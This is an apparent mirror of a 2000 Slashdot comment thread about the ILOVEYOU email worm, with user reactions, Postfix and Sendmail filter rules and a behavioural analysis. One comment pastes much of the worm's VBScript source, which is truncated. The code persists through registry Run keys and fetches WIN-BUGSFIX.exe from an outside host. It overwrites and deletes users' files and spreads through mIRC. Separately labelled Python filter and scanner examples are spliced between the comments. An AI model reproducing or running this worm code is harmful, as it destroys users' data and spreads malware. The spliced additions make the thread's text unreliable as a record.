Slashdot Mirror


I Love You "Virus" Hates Everyone

Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. It's not really a virus: it's a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destroying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so it's not for everyone.


  1. This hit where I work. by Shadowlion · · Score: 4

    I have Outlook 2000 open as we speak.

    So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.

    1. Re:This hit where I work. by Shadowlion · · Score: 2

      On the other hand, I'm personally not stupid enough to open an attachment like this (especially with the obvious tagline of "LOVE-LETTER-FOR-YOU.TXT.vbs" - gee, you think that's a Visual Basic script?).

      I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.

    2. Re:This hit where I work. by GC · · Score: 2

      A lot of users will just see LOVE-LETTER-FOR... especially in outlook. For me - it was the icon that gave it away.

  2. Dunno about the virus... by BrianW · · Score: 4

    But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.

    1. Re:Dunno about the virus... by Ed+Avis · · Score: 2

      I quite agree. If you get a message that says "If you get an email that says 'I love you', DON'T OPEN IT!", don't open it!

      --
      -- Ed Avis ed@membled.com
    2. Re:Dunno about the virus... by Denor · · Score: 2

      As another poster said, I couldn't agree more. I got an e-mail about it this morning, and had to look to make sure it had come from a real source (it had) rather than some clueless person paranoid about "viruses"
      Back when Melissa was big, I had a co-worker who got an e-mail from his sister warning about how bad Melissa was, and not to open attachments with whatever subject line Melissa had.
      Upon further inspection, his sister had mailed not only him, but everyone in her address book.
      In other words, out of ignorance or lack of wanting to even think about what she was doing, my co-worker's sister had done the exact same thing as the virus would have.
      I think some more education is in order, when people warning about viruses become more annoying than the viruses themselves.

      --
      -Denor
  3. Clean up by xianzombie · · Score: 4

    As far as I know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many military installations as well).

    Sites I've found that offer disinfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,88754-421758,00.html, as well as http://www.f-source.com

    good luck people

  4. Maybe this can get companies to consider UNIX? by jaf · · Score: 3

    Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.

    UNIX would not have a problem here..

    Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.

    People still have to be dumb enough to open the attachment.

    --
    -- jaf
    1. Re:Maybe this can get companies to consider UNIX? by sterwill · · Score: 2

      Sendmail is an MTA, not an MUA. I don't see how Sendmail (or any of the better mailers like postfix or qmail) would ever have this problem.

      --

    2. Re:Maybe this can get companies to consider UNIX? by Tackhead · · Score: 2
      sterwill wrote:
      > Sendmail is an MTA, not an MUA. I don't see how Sendmail
      > (or any of the better mailers like postfix or qmail) would ever have this problem.

      When your outgoing mail is handled by Sendmail, but your end-lusers are running M$ Outlook, and all 5000 of them are emailing everybody they know multiple copies of the virus, your Sendmail server is at risk of crashing too. It's basically an internally-generated DOS attack.

      Someone posted that Outlook is basically a DDOS tool. I couldn't agree more. If "freedom to innovate" means "freedom to build more security holes into an MUA than swiss cheese", then I, for one, would like to see the DOJ give up their talk about a M$ breakup and just pull a Waco on the Mickeysoft campus.

      If you're an administrator, you already know that your end-lusers will never disable the security holes in Outlook, and that viruses flourish in monocultures. Seriously consider mandating - as a matter of corporate security - that the risks of using Outlook outweigh the benefits, and that it not be used in your organization. Deinstall or disable it on every new desktop you set up before the user gets their hands on it.

      So what if they can't understand elm, mutt, or pine? Give 'em Eudora, Pegasus, or hell, even Nutscrape's built-in mail client. Anything but Outlook and MSexchange.

    3. Re:Maybe this can get companies to consider UNIX? by Alex+Belits · · Score: 2

      You could do the same damn thing as a bash script

      Unix mailreaders can't execute scripts from attachments.

      --
      Contrary to the popular belief, there indeed is no God.
  5. I got it..... by peterdaly · · Score: 3

    The nice thing about viruses like this is you find out about people you never met who have you in their address book....at least in my case. -Pete

  6. Re:Looks a bit like Melisa by deasmi · · Score: 4
    The first two lines of the script are quite amusing.
    rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    I do hope that's not his real address....
  7. Total Cost of ownership if Outlook/Exchange by smartin · · Score: 5

    This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companies really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.

    --
    The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
    1. Re:Total Cost of ownership if Outlook/Exchange by sTeF · · Score: 2

      it's indifferent, if you use sendmail or exchange it depends on the os, if your os is capable of running vb crap, and your e-mail client is configured to run it, then you suffer, i can imagine pine running on windows, with a mailcap entry for vbs files... but most nobody is that stupid.

    2. Re:Total Cost of ownership if Outlook/Exchange by Malachi · · Score: 5
      I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got hit by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

      Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formatting virii? Talk about large scale data loss.

      -Malachi-

      --
      "Life is all about strategy, mathematics and psychological perceptiveness."
    3. Re:Total Cost of ownership if Outlook/Exchange by smartin · · Score: 2

      Sure I do. I just get the benefit of choosing which calendar I want to use. These things should all be standards based.

      --
      The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
    4. Re:Total Cost of ownership if Outlook/Exchange by sstrick · · Score: 2

      At the risk of being flamed to a crisp:

      This is why if a company is going to use a large corporate email system they should choose Lotus Notes over exchange any day. While notes can run script on the opening of an email it has to be (unless someone is stupid enough to change the default settings) signed by a trusted sender. At least someone in your organisation who is an administrator.

      A virus such as this simply would not propagate between organisations with notes. At the worst it might screw up that organisations mail system, but if an admin really wanted to do damage there are much easier ways.

      Anyway just my $0.02.

      --

      "Do you think we could wipe out world hunger forever if scientists figured out how to make AOL's Free CD's edible?"-
    5. Re:Total Cost of ownership if Outlook/Exchange by smartin · · Score: 2

      vCard and vCalendar.

      --
      The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
    6. Re:Total Cost of ownership if Outlook/Exchange by fooeyploo · · Score: 3

      Maybe we should begin to consider Outlook as a DDOS tool? It sure seems to be a very effective one.

      --

      Don't throw your computers out the windows. Throw the Windows out of
      your computers.

    7. Re:Total Cost of ownership if Outlook/Exchange by G+Neric · · Score: 2
      C'mon: users have to take some responsibility. I get viruses sent to me all the time: I don't click on them. Sure, Outlook sucks, but I'm forced to use it at work and I still don't ever have problems with viruses.

      So, add on to your total cost of ownership the stupidity tax: it's non-refundable. And in your calculations, don't forget the opportunity cost of stupidity: if your users got the time Outlook wasted back, they'd have more time simply to figure out some other way to screw up.

    8. Re:Total Cost of ownership if Outlook/Exchange by theCoder · · Score: 2

      This does not happen when you are using Sendmail and a regular POP3 or IMAP client

      I don't know... I'm sure at least a couple of mail servers sending this message around are running sendmail :) But you're right it is the mail client's fault.

      I still think the arrogance that it can't happen to us is dangerous. Just wait until someone makes a shell script for Linux that searches your Pine/Elm/whatever address book and spreads itself that way (before finishing with a 'rm -rf ~'). That would be particularly messy.

      --
      "Save the whales, feed the hungry, free the mallocs" -- author unknown
    9. Re:Total Cost of ownership if Outlook/Exchange by kzinti · · Score: 2

      Maybe we should begin to consider Outlook as a DDOS tool?

      It certainly does seem to be a great DDoS opportunity! Maybe anybody with VBScript knowledge should be locked away as a potential hacker?

      --Jim

    10. Re:Total Cost of ownership if Outlook/Exchange by smartin · · Score: 2

      Sure writing the script is easy to do. The hard part is to mail it to pine/elm/.. users and get their mailer to automatically execute it when they open their mail. In Outlook this is apparently easy to do. That's why Outlook is so evil, this current virus seems to execute as soon as the victim opens their mail.

      How anyone could write an application with such a feature is beyond me. Why anyone would willingly install the thing on their machine is also beyond me. Which brings me back to the point of my original post. System admins and IT managers need to be made well aware of what they are getting into when they base their corporate email system on this crap. I work for a large investment bank and our email has been down for over half a day now because of this thing. I can't even guess how much it's costing the firm.

      --
      The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
    11. Re:Total Cost of ownership if Outlook/Exchange by G27+Radio · · Score: 2


      We have 600 PC's at the site I support. So far not one infected computer. I'm certainly glad we're running Notes. Otherwise I'd be running around to 600 PC's today.

      There are users at some of the company's other sites though that have the virus but it appears to be a very small number. As you pointed out, our users were able to receive the e-mail, but it didn't propagate. Outlook can't send e-mail over our network.

      numb

    12. Re:Total Cost of ownership if Outlook/Exchange by TheGreek · · Score: 2
      PHP3 and Zope are unrelated to group messaging. Do you have any idea what you're talking about?

      Yes, and C/C++ and perl are unrelated to email.

      I believe he was suggesting you write your own solution.

    13. Re:Total Cost of ownership if Outlook/Exchange by TheGratefulNet · · Score: 2
      Maybe anybody with VBScript knowledge should be locked away as a potential hacker?

      damn; Mitnick is up to his old tricks again...

      --
      "It is now safe to switch off your computer."
    14. Re:Total Cost of ownership if Outlook/Exchange by sysop · · Score: 2
      What if this had been a formatting virii? Talk about large scale data loss.

      Virii that destroy their host do not have very good chances of propagating, it's a natural selection thing.

      The same as Ebola really .. since it kills the host, it doesn't have a very good chance of passing itself onto a new host. A computer virus is no different.

      Much the same as MS Software, mediocrity is a survival characteristic.

    15. Re:Total Cost of ownership if Outlook/Exchange by Syberghost · · Score: 2

      Two Lotus Notes users at one of our data centers together destroyed over 1,300 files with this virus today.

      A mutated version of it has already appeared, with the subject line "fwd: Joke".

      Hands up, who hasn't gotten an email in the last month with a similar subject line, from someone one trusts?

      Fortunately, with Notes it didn't propagate; but one person pulling personal email with Outlook (and we had that happen too) can devastate a company full of Notes users.

      BTW, anybody heard anything about CBS? Rumor (and it's just a rumor, I have not confirmed anything) is that they sent an "all-hands" email to the entire company, from an infected system. Ouch, if it's true.

      --

    16. Re:Total Cost of ownership if Outlook/Exchange by mpe · · Score: 2

      Virii that destroy their host do not have very good chances of propagating, it's a natural selection thing.

      Actually a virus can kill its host and become "epidemic", just so long as it doesn't kill the host too quickly...
      Much the same as MS Software, mediocrity is a survival characteristic.

      Also in biology unfit hosts stay dead, this isn't the case in the software sphere. Even if a virus did kill Windows someone would be apt to resurrect it.

    17. Re:Total Cost of ownership if Outlook/Exchange by Wah · · Score: 2

      no need to fight. We should help the wounded.

      Note: Link reposted 'cause nobody reads for the articles.
      --
      +&x
  8. Well Damn by zpengo · · Score: 2

    Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!

    --


    Got Rhinos?
  9. Re:OPening e-mail attachments by akey · · Score: 5

    OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

    Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

    ---
    "Go Metallica. Die RIAA." -- Linus Torvalds
  10. Solution for Postfix by njr · · Score: 5
    If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

    header_checks = regexp:/etc/postfix/header_checks

    Add the following line in /etc/postfix/header_checks:

    /^Subject: ILOVEYOU/ REJECT

    This will reject mails containing this subject.

    Thanks to Claus Guttesen who posted this on the postfix mailing list.

    1. Re:Solution for Postfix by otmar · · Score: 5

      Sendmail can filter that crap as well, just add

      HSubject: $>local_check_header_subject
      D{loveletterMessage}"553 Your message may contain a worm."
      Slocal_check_header_subject
      RILOVEYOU $#error $: ${loveletterMessage}

      to your sendmail.cf (version > 8.9 !).

      (there is a tab between the ILOVEYOU and $#error.)

      /ol (credits go to a cow-orker, though)
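Both rules above match only the Subject header, so a copy sent under another subject (such as the "fwd: Joke" variant reported elsewhere in this thread) passes them. The following is an added example, not code from either poster or from the Postfix or Sendmail projects: it applies the same subject pattern plus an attachment-name check to constructed messages; the function names, the sample addresses and file names, and the choice to block this extension set are assumptions.

```python
import re
from email import message_from_string
from email.message import EmailMessage

# The header_checks pattern quoted above. Postfix regexp tables match
# case-insensitively by default, hence re.IGNORECASE.
SUBJECT_RULE = re.compile(r"^Subject: ILOVEYOU", re.IGNORECASE)

# Script extensions named in the worm listing posted in this thread.
# Blocking exactly this set at the gateway is an assumption of the example.
SCRIPT_EXT = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta"}


def subject_rule_hits(raw):
    """Apply the subject pattern to each header, one logical line at a time."""
    msg = message_from_string(raw)
    for name, value in msg.items():
        logical = "%s: %s" % (name, " ".join(str(value).split()))
        if SUBJECT_RULE.search(logical):
            return True
    return False


def script_attachments(raw):
    """Return (filename, disguised) for each attachment ending in a script extension."""
    hits = []
    for part in message_from_string(raw).walk():
        fname = part.get_filename()
        if not fname:
            continue
        pieces = fname.lower().split(".")
        if len(pieces) > 1 and pieces[-1] in SCRIPT_EXT:
            # disguised: a second extension sits in front, as in "X.TXT.vbs"
            hits.append((fname, len(pieces) > 2))
    return hits


def verdict(raw):
    """Subject rule first (what the posts above do), then the attachment check."""
    if subject_rule_hits(raw):
        return "reject:subject"
    if script_attachments(raw):
        return "reject:attachment"
    return "accept"


def build(subject, filename):
    """Constructed sample message; the attachment body is a placeholder, not worm code."""
    m = EmailMessage()
    m["From"] = "alice@example.com"
    m["To"] = "bob@example.com"
    m["Subject"] = subject
    m.set_content("constructed sample body")
    m.add_attachment(b"constructed placeholder", maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_string()


SAMPLES = {
    "original": build("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "variant": build("fwd: Joke", "constructed-joke.vbs"),  # attachment name is made up
    "benign": build("Meeting notes", "notes.txt"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, verdict(raw), script_attachments(raw))
```
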

  11. Source at ftp://weazel.student.utwente.nl/pub/ by Anonymous Coward · · Score: 2

    It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what it does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt

  12. Fast spread, but better handled? by redelm · · Score: 2

    I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

    1. Re:Fast spread, but better handled? by / · · Score: 3

      Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

      You mean they took the obvious step of ceasing to use software whose crappy design makes it specifically vulnerable to this sort of virus? Or do you mean they just engaged in damage control and will still be whacked the next time such a virus comes around?

      No software should be able to edit a registry file or its equivalent without specific permission from an informed user. Period.

      --
      "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  13. Pretty Nasty actually by scrutty · · Score: 5
    We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

    It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

    This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

    And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

    --
    -- Oh Well
    1. Re:Pretty Nasty actually by fooeyploo · · Score: 5

      I really think Microsoft has been getting a lot of things backwards. I think a more appropriate name for Outlook would have been Lookout!

      --
      Don't throw your computers out the windows. Throw the Windows out of
      your computers.

    2. Re:Pretty Nasty actually by scumdamn · · Score: 2

      I actually received many of the messages. One showed up in my preview pane, but didn't infect my system. Maybe some versions of outlook automatically open the VBScript files and some don't. Can we get some confirmation on this? I'm running Outlook 2k.

    3. Re:Pretty Nasty actually by Simoriah · · Score: 2

      I work as a sysadmin for EDS (Electronic Data Systems). We got hit by this thing this morning. EDS's solution was pretty harsh. Any e-mail over 10k is getting deleted. Any attachment that pushes a message over 10k is being deleted. Any account sending ANY .vbs file is getting deactivated.

      This damn thing brought down 3 mail servers, and a handful of other servers.

      It's nice to know that something like a mail message can cripple an organization like EDS.

      --
      "It compiles, SHIP IT!" -Overheard at Microsoft's development lab
  14. E-mail too versatile? by zpengo · · Score: 2
    Perhaps we should go back to the days of simple e-mail clients, that would make a virus like this look around, get confused, and then fall over.

    Either that, or people need to stop using the address books, which are for lusers anyway! :o)

    --


    Got Rhinos?
    1. Re:E-mail too versatile? by ptomblin · · Score: 2

      The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
      --
      A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.

      --
      The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
    2. Re:E-mail too versatile? by Overt+Coward · · Score: 2

      And any Linux user that ran it as root would deserve what (s)he got as a consequence. In the normal case, some user files could get trashed, but the system should still be safe.

      --

  15. It's hitting all over Europe. by Noryungi · · Score: 2


    My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.

    I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!

    --
    The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
  16. Outlook Strikes Again. by nard · · Score: 2

    From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!

  17. Next step: AutoEducation.exe by FascDot+Killed+My+Pr · · Score: 3

    This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.

    The recipient then falls into one of three classes:

    1) Can't get/read virus.
    2) Can get/read virus and gets stung (and appended to list).
    3) Can get/read virus, doesn't get stung, received handy list of idiot coworkers.

    This list can be used in a multitude of ways:

    1) Reduce headcount
    2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
    3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)

    --
    Have Exchange users? Want to run Linux? Can't afford OpenMail?

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:Next step: AutoEducation.exe by Black+Parrot · · Score: 3

      A friend is trying to get permission from her boss to deliberately post a virus on her corporate network one weekend per month. A virus that turns off VB scripting on any machine where it runs.

      --
      Sheesh, evil *and* a jerk. -- Jade
    2. Re:Next step: AutoEducation.exe by Wanker · · Score: 2

      BE CAREFUL-- a company I used to work for used viral techniques for automatically installing/updating antivirus software and quickly gave up on the idea. It's too easy to "spread" to a system where you don't want to have the fix applied.

      A better solution is to run it as a non-viral application as part of the user's network login.

      If you're dead-set on using viral techniques make sure that the application checks a central server for a blacklist of systems to refrain from infecting, and a whitelist of network addresses to ONLY infect. This will allow you to control its spread. Also-- be sure to include a self-destruct/undo capability triggered by this same server, and include an unambiguous string that is easy to add to your virus scanners should it "get away" from you.

      Again, it's really better to avoid doing this at all. Been there.

  18. The only love letter I've ever gotten... and I can't open it....

    --

    Ceci n'est pas une sig.
  19. Re:Analysis by Anonymous Coward · · Score: 5

    Sorry - lost the /n's there

    It's a VBS worm. It spreads by two methods, irc and email.

    On startup it sets the registry key
    HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
    to 0

    It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
    WINNT/Win32DLL.vbs
    WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

    It then creates registry keys

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

    which will run the script again on the next boot of the computer

    Next it checks to see if the IE download directory is set in the registry
    - if it is it remembers that value, otherwise it uses c:\ instead.

    It then checks to see if /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
    it sets Internet Explorer's start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

    It then checks to see if this file has been downloaded (i.e. when the script is run at a later date). If it has, it sets this .exe to be run at next boot and resets the IE home page to about:blank (blank page)

    Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
    This basically contains the worm itself set to run when the page is
    viewed.

    Now it does the old trick of opening the Outlook address book, grabbing
    *all* the entries in it and emailing them an email with the subject line "ILOVEYOU" and the worm as an attachment.

    Now it has a look around all the drives on the machine (local drives I think) and does the following
    a) If it finds mirc, edits its ini file so when you next log onto an
    irc channel it dcc's itself to all the other users
    b) Overwrites any .vbs and .vbe files it finds with itself
    c) If it finds any vbs, vbe, css, wsh, sct or hta files it deletes them,
    creates a new file with the same name ending in vbs and copies itself to
    it
    d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

    Then the script ends

    Stuart
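For cleanup triage on a drive or share the worm could reach, the file-level traces described in this analysis and in the script listing posted in the thread can be searched for directly. The following is an added example, not part of the original post: a Python scanner that walks a directory tree and labels matches, run here against a constructed tree of placeholder files; the labels, function names and sample paths are assumptions.

```python
import os
import tempfile

MARKER = b"barok -loveletter"  # from the first line of the script quoted in this thread
# File names the posts in this thread say the worm drops or downloads.
# A name match alone is a hint for review, not proof.
DROPPED = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt",
           "love-letter-for-you.txt.vbs", "love-letter-for-you.htm",
           "win-bugsfix.exe"}
MEDIA = {"jpg", "jpeg", "mp3", "mp2"}


def head(path, limit=4096):
    """Return the first bytes of a file, lower-cased; empty on read errors."""
    try:
        with open(path, "rb") as fh:
            return fh.read(limit).lower()
    except OSError:
        return b""


def classify(dirpath, name, siblings):
    """Return a finding label for one file, or None when nothing matches."""
    low = name.lower()
    path = os.path.join(dirpath, name)
    if low in DROPPED:
        return "dropped-name"
    if low == "script.ini":
        data = head(path)
        if b"dcc send" in data and b"love-letter-for-you.htm" in data:
            return "mirc-script"
        return None
    if low.endswith(".vbs") and MARKER in head(path):
        inner = low[:-4]  # file name without the trailing .vbs
        ext = inner.rsplit(".", 1)[-1] if "." in inner else ""
        if ext in MEDIA:
            # Per the listing: mp3/mp2 originals are kept but hidden,
            # jpg/jpeg originals are overwritten and deleted.
            if inner in siblings:
                return "media-copy:original-present"
            return "media-copy:original-missing"
        return "script-overwritten"
    return None


def scan(root):
    """Walk root and return sorted (relative path, label) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        siblings = {f.lower() for f in files}
        for name in files:
            label = classify(dirpath, name, siblings)
            if label:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel.replace(os.sep, "/"), label))
    return sorted(findings)


def demo():
    """Build a constructed tree (placeholder contents, no worm code) and scan it."""
    stub = b"rem barok -loveletter(vbe)\r\nrem constructed placeholder\r\n"
    files = {
        "web/index.vbs": stub,                 # stands in for an overwritten script
        "web/logo.jpg.vbs": stub,              # logo.jpg itself is gone
        "music/song.mp3": b"constructed audio placeholder",
        "music/song.mp3.vbs": stub,
        "music/notes.txt": b"harmless",
        "scripts/backup.vbs": b"' legitimate admin script\r\n",
        "mirc/script.ini": b"[script]\r\nn2= /.dcc send $nick "
                           b"C:\\X\\LOVE-LETTER-FOR-YOU.HTM\r\n",
        "sys/MSKernel32.vbs": stub,
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return scan(root)


if __name__ == "__main__":
    for rel, label in demo():
        print(label, rel)
```
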

  20. Here is the Visual Basic Script that is "ILOVEYOU" by GC · · Score: 5
    rem barok -loveletter(vbe)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
    if (downread="") then
    downread="c:\"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
    end if
    end if
    if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"\")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&"\"&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eqfolderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
    set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled Mardam-Bey"
    scriptini.WriteLine ";http://www.mirc.com"
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
